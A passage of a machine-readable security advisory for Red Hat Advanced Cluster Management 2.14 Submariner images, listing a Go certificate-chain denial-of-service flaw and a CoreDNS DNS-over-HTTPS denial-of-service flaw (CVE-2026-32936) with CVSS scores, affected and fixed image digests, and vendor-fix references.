"details": "For release note details, see the upstream Submariner release notes:\n\nhttps://submariner.io/community/releases/\n\nDownstream-specific issues resolved:\n* ACM-27238\n* ACM-28294\n* ACM-28295\n* ACM-28311\n* ACM-28313\n* ACM-28314\n* ACM-28315\n* ACM-28316\n* ACM-28329\n* ACM-28331\n* ACM-28333\n* ACM-28335\n* ACM-28337\n* ACM-28339\n* ACM-28342\n* ACM-29317\n* ACM-29511\n* ACM-29613\n* ACM-29614\n* ACM-29631\n* ACM-29632\n* ACM-29633\n* ACM-29634\n* ACM-29776\n* ACM-30134\n* ACM-30726\n* ACM-30727\n* ACM-30728\n* ACM-30729\n* ACM-30970\n* ACM-31136\n* ACM-31831\n* ACM-31840\n* ACM-32575\n* ACM-32842\n* ACM-34108\n* ACM-34586\n* ACM-34589\n\nFor more details, see the Red Hat Advanced Cluster Management for Kubernetes documentation:\n\nhttps://docs.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.14/",
"product_ids": [
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:5455803b15f596679c80af65bc7e4d600d68bffcdfba6701444ff5da039f5bb2_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:5e1d6eea31cf8b7a3e5d1c94af072c81f1be1da47122938a2eeec7acd6e778c7_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:a154b2b05fe49a472506ed9f211693057361b9a58b0fa6477afb7abbba9e9e54_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:cac1a0a0a72004f64edb104385d2c0683a15401c8970777a2db2978b4fa32d33_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:25127"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:0cbb0970c438efa6f7da80f8628b76550d8986d7f73b4f00e5c929d766472d7b_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:6aaeb062ada48648fd880cc1094180a2fa2b0bb3e9bbd9b0bcbe9a833c7f7208_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:bbe086814cc2fe9e53699ff23705479b493a62f9521b5f2664fcdb97dd5705a9_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:eac6affcb33fec57b7c3018346aa26759326b49264973b5c9a01d1a7c18285fc_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:84ea010ee8369be60c67bb28c831897583c5d23055c902c5e68be70729d80b73_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:e688af48ddf8d59c39e64b4c38e72fc2d6f06f28ab3732703d1c1664d91bdad7_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:e802f821ed0cc9f6f026a0385681e9e8b0daad39b6e7ea75e7c99f3df28e4e44_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:eee8da5b239e8a1cb5dc52e6ab514eebe159977afe842a0f7035732701a6f87a_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:5b036c08592fc679e4a158d58e2077929d07eb62825d94fd55afeedaa831d154_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:80e8f73158f4300a85f94c84a4e71fd6c0d4ce9553380c623f156b137497dc5c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:831c2d010a7f93da6c7f803c464171e3b14c2fe15779e3d2b0829f8d0f4e2285_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:f928393188edf404a004d4a692c8b633bd9c3ea4c8cabd5a9441c82d482c84a9_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:5455803b15f596679c80af65bc7e4d600d68bffcdfba6701444ff5da039f5bb2_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:5e1d6eea31cf8b7a3e5d1c94af072c81f1be1da47122938a2eeec7acd6e778c7_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:a154b2b05fe49a472506ed9f211693057361b9a58b0fa6477afb7abbba9e9e54_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:cac1a0a0a72004f64edb104385d2c0683a15401c8970777a2db2978b4fa32d33_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:157ec65b5967f65026b2e6c8d688fa734dbd8d2b056960b43d2ee9672979d120_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:2629fcf4d38774d9d4fa5bb72bb664982b32b8b8e1018a36d6bfd0b05a16a1c9_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:5118901bb1b8336f1a99f8757a32d61070fde1b4a26e40b7282aae81ae0b741d_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:7314924a015ddfc1dde55dd4991b9b3df8e8a279c3ce354d9d86ae66adfa46da_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:2d6f324a2f853471f3697da356db792ea9203939c4a12c02040c4cf62bbb9fb1_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:a7f2ac46b1edce62e4a8707e940a3813016b6a7c7ee11225700c792bc449ee33_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:be69bc672cabbced9e23829820685b30183bae1910a8af9fed5c1eff3a11aca3_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:ed6fa4602b7d1f175e8df0601be5b2c3e8ea9d906dc9cd2fd8a5ab76eea97175_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-operator-bundle@sha256:5b64e063acaeec1bae4ef902f3b482b47d85c0964e944e53663cff73f530a701_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:01a082229dbfbfee20345e1ccff5c8ac3ac3bd727a666d29221f465b43701133_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:100e10f6c2959526a2335d81d99c6887b16a29bd59e005e519140206d0ce73ed_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:2f772da0e95d6690c14966eaf7bb097a0c567a7077b93eb61d8bbcc552be4d1b_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:60c2e8e50cec20d1c78df0629256403d667ea47989aa3c30c696e76ce5e264e4_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:30dfcfaaf77a270fbcec02e53c013af5570a65334ef666cd77c9bef0a54d3418_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:5a97cf1a1723932e74bb1fc4fc410df0d78dd3035203cd7684bc3d6485d6f2e5_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:83a6d00f217f3e9000d6e6cba602d52b65922290dbb0dcdae8ee12b1c8b383c1_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:c52a0fb2364483a9c23763e76bfeae9923a9ae3d35e646012c528f7cc46bcdc1_ppc64le"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "crypto/x509: crypto/tls: golang: Go: Denial of Service vulnerability in certificate chain building"
},
{
"cve": "CVE-2026-32936",
"cwe": {
"id": "CWE-1284",
"name": "Improper Validation of Specified Quantity in Input"
},
"discovery_date": "2026-05-05T20:01:52.218439+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:5b036c08592fc679e4a158d58e2077929d07eb62825d94fd55afeedaa831d154_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:80e8f73158f4300a85f94c84a4e71fd6c0d4ce9553380c623f156b137497dc5c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:831c2d010a7f93da6c7f803c464171e3b14c2fe15779e3d2b0829f8d0f4e2285_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:f928393188edf404a004d4a692c8b633bd9c3ea4c8cabd5a9441c82d482c84a9_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:5455803b15f596679c80af65bc7e4d600d68bffcdfba6701444ff5da039f5bb2_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:5e1d6eea31cf8b7a3e5d1c94af072c81f1be1da47122938a2eeec7acd6e778c7_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:a154b2b05fe49a472506ed9f211693057361b9a58b0fa6477afb7abbba9e9e54_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:cac1a0a0a72004f64edb104385d2c0683a15401c8970777a2db2978b4fa32d33_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:157ec65b5967f65026b2e6c8d688fa734dbd8d2b056960b43d2ee9672979d120_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:2629fcf4d38774d9d4fa5bb72bb664982b32b8b8e1018a36d6bfd0b05a16a1c9_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:5118901bb1b8336f1a99f8757a32d61070fde1b4a26e40b7282aae81ae0b741d_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:7314924a015ddfc1dde55dd4991b9b3df8e8a279c3ce354d9d86ae66adfa46da_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:2d6f324a2f853471f3697da356db792ea9203939c4a12c02040c4cf62bbb9fb1_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:a7f2ac46b1edce62e4a8707e940a3813016b6a7c7ee11225700c792bc449ee33_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:be69bc672cabbced9e23829820685b30183bae1910a8af9fed5c1eff3a11aca3_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:ed6fa4602b7d1f175e8df0601be5b2c3e8ea9d906dc9cd2fd8a5ab76eea97175_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-operator-bundle@sha256:5b64e063acaeec1bae4ef902f3b482b47d85c0964e944e53663cff73f530a701_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:01a082229dbfbfee20345e1ccff5c8ac3ac3bd727a666d29221f465b43701133_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:100e10f6c2959526a2335d81d99c6887b16a29bd59e005e519140206d0ce73ed_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:2f772da0e95d6690c14966eaf7bb097a0c567a7077b93eb61d8bbcc552be4d1b_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:60c2e8e50cec20d1c78df0629256403d667ea47989aa3c30c696e76ce5e264e4_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:30dfcfaaf77a270fbcec02e53c013af5570a65334ef666cd77c9bef0a54d3418_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:5a97cf1a1723932e74bb1fc4fc410df0d78dd3035203cd7684bc3d6485d6f2e5_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:83a6d00f217f3e9000d6e6cba602d52b65922290dbb0dcdae8ee12b1c8b383c1_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:c52a0fb2364483a9c23763e76bfeae9923a9ae3d35e646012c528f7cc46bcdc1_ppc64le"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2466869"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in CoreDNS, a DNS server that chains plugins. A remote, unauthenticated attacker can exploit this vulnerability by repeatedly sending oversized DNS-over-HTTPS (DoH) GET requests. The GET path, unlike the POST path, lacks size validation before processing large `dns=` query parameter values. This can lead to high CPU usage, significant memory allocations, and increased garbage collection, resulting in a Denial of Service (DoS).",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "github.com/coredns/coredns: CoreDNS: Denial of Service via oversized DNS-over-HTTPS GET requests",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:0cbb0970c438efa6f7da80f8628b76550d8986d7f73b4f00e5c929d766472d7b_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:6aaeb062ada48648fd880cc1094180a2fa2b0bb3e9bbd9b0bcbe9a833c7f7208_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:bbe086814cc2fe9e53699ff23705479b493a62f9521b5f2664fcdb97dd5705a9_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:eac6affcb33fec57b7c3018346aa26759326b49264973b5c9a01d1a7c18285fc_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:84ea010ee8369be60c67bb28c831897583c5d23055c902c5e68be70729d80b73_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:e688af48ddf8d59c39e64b4c38e72fc2d6f06f28ab3732703d1c1664d91bdad7_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:e802f821ed0cc9f6f026a0385681e9e8b0daad39b6e7ea75e7c99f3df28e4e44_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:eee8da5b239e8a1cb5dc52e6ab514eebe159977afe842a0f7035732701a6f87a_amd64"
],
"known_not_affected": [
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:5b036c08592fc679e4a158d58e2077929d07eb62825d94fd55afeedaa831d154_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:80e8f73158f4300a85f94c84a4e71fd6c0d4ce9553380c623f156b137497dc5c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:831c2d010a7f93da6c7f803c464171e3b14c2fe15779e3d2b0829f8d0f4e2285_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:f928393188edf404a004d4a692c8b633bd9c3ea4c8cabd5a9441c82d482c84a9_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:5455803b15f596679c80af65bc7e4d600d68bffcdfba6701444ff5da039f5bb2_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:5e1d6eea31cf8b7a3e5d1c94af072c81f1be1da47122938a2eeec7acd6e778c7_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:a154b2b05fe49a472506ed9f211693057361b9a58b0fa6477afb7abbba9e9e54_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:cac1a0a0a72004f64edb104385d2c0683a15401c8970777a2db2978b4fa32d33_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:157ec65b5967f65026b2e6c8d688fa734dbd8d2b056960b43d2ee9672979d120_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:2629fcf4d38774d9d4fa5bb72bb664982b32b8b8e1018a36d6bfd0b05a16a1c9_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:5118901bb1b8336f1a99f8757a32d61070fde1b4a26e40b7282aae81ae0b741d_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:7314924a015ddfc1dde55dd4991b9b3df8e8a279c3ce354d9d86ae66adfa46da_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:2d6f324a2f853471f3697da356db792ea9203939c4a12c02040c4cf62bbb9fb1_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:a7f2ac46b1edce62e4a8707e940a3813016b6a7c7ee11225700c792bc449ee33_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:be69bc672cabbced9e23829820685b30183bae1910a8af9fed5c1eff3a11aca3_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:ed6fa4602b7d1f175e8df0601be5b2c3e8ea9d906dc9cd2fd8a5ab76eea97175_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-operator-bundle@sha256:5b64e063acaeec1bae4ef902f3b482b47d85c0964e944e53663cff73f530a701_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:01a082229dbfbfee20345e1ccff5c8ac3ac3bd727a666d29221f465b43701133_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:100e10f6c2959526a2335d81d99c6887b16a29bd59e005e519140206d0ce73ed_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:2f772da0e95d6690c14966eaf7bb097a0c567a7077b93eb61d8bbcc552be4d1b_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:60c2e8e50cec20d1c78df0629256403d667ea47989aa3c30c696e76ce5e264e4_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:30dfcfaaf77a270fbcec02e53c013af5570a65334ef666cd77c9bef0a54d3418_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:5a97cf1a1723932e74bb1fc4fc410df0d78dd3035203cd7684bc3d6485d6f2e5_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:83a6d00f217f3e9000d6e6cba602d52b65922290dbb0dcdae8ee12b1c8b383c1_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:c52a0fb2364483a9c23763e76bfeae9923a9ae3d35e646012c528f7cc46bcdc1_ppc64le"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-32936"
},
{
"category": "external",
"summary": "RHBZ#2466869",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2466869"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-32936",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-32936"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-32936",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-32936"
},
{
"category": "external",
"summary": "https://github.com/coredns/coredns/releases/tag/v1.14.3",
"url": "https://github.com/coredns/coredns/releases/tag/v1.14.3"
},
{
"category": "external",
"summary": "https://github.com/coredns/coredns/security/advisories/GHSA-63cw-r7xf-jmwr",
"url": "https://github.com/coredns/coredns/security/advisories/GHSA-63cw-r7xf-jmwr"
}
],
"release_date": "2026-05-05T19:07:51.926000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-06-10T20:51:55+00:00",
"details": "For release note details, see the upstream Submariner release notes:\n\nhttps://submariner.io/community/releases/\n\nDownstream-specific issues resolved:\n* ACM-27238\n* ACM-28294\n* ACM-28295\n* ACM-28311\n* ACM-28313\n* ACM-28314\n* ACM-28315\n* ACM-28316\n* ACM-28329\n* ACM-28331\n* ACM-28333\n* ACM-28335\n* ACM-28337\n* ACM-28339\n* ACM-28342\n* ACM-29317\n* ACM-29511\n* ACM-29613\n* ACM-29614\n* ACM-29631\n* ACM-29632\n* ACM-29633\n* ACM-29634\n* ACM-29776\n* ACM-30134\n* ACM-30726\n* ACM-30727\n* ACM-30728\n* ACM-30729\n* ACM-30970\n* ACM-31136\n* ACM-31831\n* ACM-31840\n* ACM-32575\n* ACM-32842\n* ACM-34108\n* ACM-34586\n* ACM-34589\n\nFor more details, see the Red Hat Advanced Cluster Management for Kubernetes documentation:\n\nhttps://docs.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.14/",
"product_ids": [
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:0cbb0970c438efa6f7da80f8628b76550d8986d7f73b4f00e5c929d766472d7b_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:6aaeb062ada48648fd880cc1094180a2fa2b0bb3e9bbd9b0bcbe9a833c7f7208_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:bbe086814cc2fe9e53699ff23705479b493a62f9521b5f2664fcdb97dd5705a9_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:eac6affcb33fec57b7c3018346aa26759326b49264973b5c9a01d1a7c18285fc_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:84ea010ee8369be60c67bb28c831897583c5d23055c902c5e68be70729d80b73_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:e688af48ddf8d59c39e64b4c38e72fc2d6f06f28ab3732703d1c1664d91bdad7_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:e802f821ed0cc9f6f026a0385681e9e8b0daad39b6e7ea75e7c99f3df28e4e44_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:eee8da5b239e8a1cb5dc52e6ab514eebe159977afe842a0f7035732701a6f87a_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:25127"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base, or stability.",
"product_ids": [
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:0cbb0970c438efa6f7da80f8628b76550d8986d7f73b4f00e5c929d766472d7b_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:6aaeb062ada48648fd880cc1094180a2fa2b0bb3e9bbd9b0bcbe9a833c7f7208_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:bbe086814cc2fe9e53699ff23705479b493a62f9521b5f2664fcdb97dd5705a9_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:eac6affcb33fec57b7c3018346aa26759326b49264973b5c9a01d1a7c18285fc_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:84ea010ee8369be60c67bb28c831897583c5d23055c902c5e68be70729d80b73_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:e688af48ddf8d59c39e64b4c38e72fc2d6f06f28ab3732703d1c1664d91bdad7_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:e802f821ed0cc9f6f026a0385681e9e8b0daad39b6e7ea75e7c99f3df28e4e44_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:eee8da5b239e8a1cb5dc52e6ab514eebe159977afe842a0f7035732701a6f87a_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:5b036c08592fc679e4a158d58e2077929d07eb62825d94fd55afeedaa831d154_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:80e8f73158f4300a85f94c84a4e71fd6c0d4ce9553380c623f156b137497dc5c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:831c2d010a7f93da6c7f803c464171e3b14c2fe15779e3d2b0829f8d0f4e2285_arm64",
